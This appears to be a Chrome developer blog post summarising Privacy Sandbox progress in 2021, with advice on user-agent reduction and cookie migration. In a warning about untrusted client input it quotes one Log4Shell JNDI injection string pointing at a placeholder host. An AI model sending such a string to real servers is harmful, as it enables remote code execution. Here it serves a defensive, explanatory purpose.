Progress in the Privacy Sandbox (December 2021)
Welcome to the 2021 wrap-up edition of Progress in the Privacy Sandbox, tracking the milestones on the path to phasing out third-party cookies in Chrome and working towards a more private web. Normally, we share an overview of updates to the Privacy Sandbox timeline along with news from across the project, but December was a quiet month. Instead, we'll look back at some of the activities over 2021 and provide a few potential resolutions you can make now we are in the new year.
Chromium development process
For a new web platform feature to land in Chromium, it needs to go through the project's open development process. In 2021, the Privacy Sandbox team produced:
🥚 | Intent to Prototype | 19 |
🧪 | Intent to Experiment | 7 |
🚀 | Intent to Ship | 11 |
Each milestone is also an invitation for the wider web ecosystem to contribute.
An Intent to Prototype is the first checkpoint, where we invite discussion and early experimentation. This means a proposal will be available on GitHub, where you can ask a question by creating an Issue or join discussions and presentations in standards groups such as the W3C and IETF. This is also where coding begins, which means you can expect the prototype functionality to be made available for developer testing behind a feature flag. Initial feedback is critical for validating and iterating on proposals.
An Intent to Experiment is an optional step if we’d like to request an origin trial. Developers can sign up for the origin trial of a feature, and then test it in production. It's called an experiment because we have specific aspects of the feature we want to validate in real-world environments. Developers that can test and share the results of those tests provide valuable feedback to help iterate and evolve the feature.
An Intent to Ship is the final milestone which signals that a feature is now complete and ready for general availability. Once approved, the feature is merged into an upcoming release and then progresses through the Canary, Beta, and Stable channels. It's critical to ensure you test your sites with the Canary and Beta versions of Chrome to catch and report any bugs before a feature reaches Stable.
Proposals
Each Privacy Sandbox proposal has an accompanying GitHub repository. A repository hosts an explainer to summarize overall functionality, a detailed specification for implementation by browsers, and contributions from across the web ecosystem in the form of Issues and Pull Requests.
Across 14 Privacy Sandbox repositories, we had:
💬 | 545 | Issues created |
250 | Issues closed | |
🛠️ | 261 | Pull Requests created |
223 | Pull Requests merged |
The language in explainers and specifications is often targeted to an audience already familiar with standards and browser development, which can be challenging if you're unfamiliar with it. However, the aim of an explainer is to explain! If there are points that are unclear or not covered, we want you to raise an Issue so we can update and clarify the explainer.
Resolutions
User-agent spring cleaning
As we were counting down to the New Year, we're also counting up to both Chrome 100 and the incremental reduction of the user-agent string. This is a good motivator to revisit any usage of the user-agent string in your code to check if it's affected by either of these changes.
To find those areas:
- Search for
navigator.userAgent
in your JavaScript code, or access to theUser-Agent
header in your server code. - Check your parsing of the string for assumptions about a 2 digit version. For example, a regex that specifies
\d\d
or\d{2}
should be replaced with\d+
. - Check your use of the string for anywhere you rely on the:
- platform (operating system) version
- full Chrome build version
- mobile device name
- These are the values that will be reduced to fixed strings in the future. If you need access to these values, migrate to User-Agent Client Hints.
There is one December update to mention—if you are adopting User-Agent Client Hints, we have sent the Intent to Ship to enable delegating hints to other origins in HTML via a <meta>
tag. For example:
<meta name="accept-ch" content="sec-ch-ua-model=( https://foo.bar )">
If you're in an enthusiastic spring cleaning mood, you can also consider alternatives to the use of user-agent altogether. If you're using the string to detect mobile devices, then investigate if you can replace this with responsive design. If you're checking the browser name and version for feature support, see if you can use feature detection instead.
It's always worth remembering that the user-agent, like any client provided value, is not guaranteed to be accurate or even provided. The recent Log4j vulnerability, "Log4shell" provides an example of this risk. A client that sets its user-agent string to include a value like ${jndi:ldap://example.com/file}
may be able to get a site to actively parse that on the server.
It's critical that you treat user-agent in the same way as any other form of user input: sanitize and validate it before acting on the value.
Cookie cataloguing
Another traditional new year activity is to make sure you're happy that you have a healthy number of cookies with quality ingredients. As we continue moving towards the phase out of third-party cookies, you should make sure you know which of your site's cookies will be affected. 2020 provided a headstart as it became necessary to mark all cookies for cross-site or third-party use with SameSite=None
.
Any cookie where you have set the SameSite
attribute to None
will need an update.
There are three possible routes to consider at the moment:
- If the cookie is only required in a 1:1 relationship with the top-level site, then follow the progress of the CHIPS proposal. This will mean adding the
Partitioned
attribute to the cookie. - If the cookie is used in a cross-site context, but only across sites that you own and operate, then it may be a candidate for First-Party Sets. This requires defining the sites in the set and adding the
SameParty
attribute to the cookie. - If the cookie is used to provide some form of shared value across multiple sites, investigate the wider set of Privacy Sandbox proposals for an alternative solution that does not rely on cross-site tracking.
If you're feeling especially health-conscious, then this is also an ideal time to revisit all of your cookie usage, as we have a good recipe to improve your first-party cookies too.
Feedback
As we continue to publish these monthly updates, and progress through the Privacy Sandbox as a whole, we want to make sure that developers receive the information and support that they need. Let us know on @ChromiumDev Twitter if there's anything that we could improve in this series. We'll use your input to continue improving the format.
Check out the Privacy Sandbox FAQ, which we continue to expand based on the issues you submit to the developer support repo. If you have any questions around testing or implementation on any of the proposals, come talk to us there.